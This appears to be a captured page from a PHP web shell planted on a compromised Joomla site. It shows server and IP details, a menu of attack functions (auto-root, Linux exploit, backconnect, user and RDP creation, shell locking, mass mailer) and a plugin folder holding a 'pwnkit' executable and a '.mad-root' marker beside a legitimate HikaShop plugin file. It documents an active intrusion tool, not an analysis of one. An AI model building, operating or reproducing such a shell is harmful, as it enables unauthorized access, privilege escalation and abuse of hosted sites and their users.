Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
plugins /
quickicon /
hikashop /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
hikashop.php
1.4
KB
-rw-r--r--
hikashop.xml
964
B
-rw-r--r--
index.html
44
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hikashop.php
<?php /** * @package HikaShop for Joomla! * @version 4.5.1 * @author hikashop.com * @copyright (C) 2010-2022 HIKARI SOFTWARE. All rights reserved. * @license GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html */ defined('_JEXEC') or die('Restricted access'); ?><?php class plgQuickiconHikaShop extends JPlugin { public function __construct(&$subject, $config) { parent::__construct($subject, $config); $this->loadLanguage('com_hikashop.sys'); } public function onGetIcons($context) { if(!defined('DS')) define('DS',DIRECTORY_SEPARATOR); $hikashopHelper = rtrim(JPATH_ADMINISTRATOR,DS).DS.'components'.DS.'com_hikashop'.DS.'helpers'.DS.'helper.php'; if($context != $this->params->get('context', 'mod_quickicon') || !file_exists($hikashopHelper) || !JFactory::getUser()->authorise('core.manage', 'com_hikashop')) { return; } if(version_compare(JVERSION, '4.0', '>=')) { $img = 'fa fa-shopping-cart'; } else if(version_compare(JVERSION, '3.0', '>=')) { $img = 'cart'; } else { $img = JURI::base().'../media/com_hikashop/images/icons/icon-48-hikashop.png'; } return array( array( 'link' => JRoute::_('index.php?option=com_hikashop'), 'image' => $img, 'text' => $this->params->get('displayedtext', JText::_('HIKASHOP')), 'access' => array('core.manage', 'com_hikashop'), 'id' => 'plg_quickicon_hikashop' ) ); } }
Close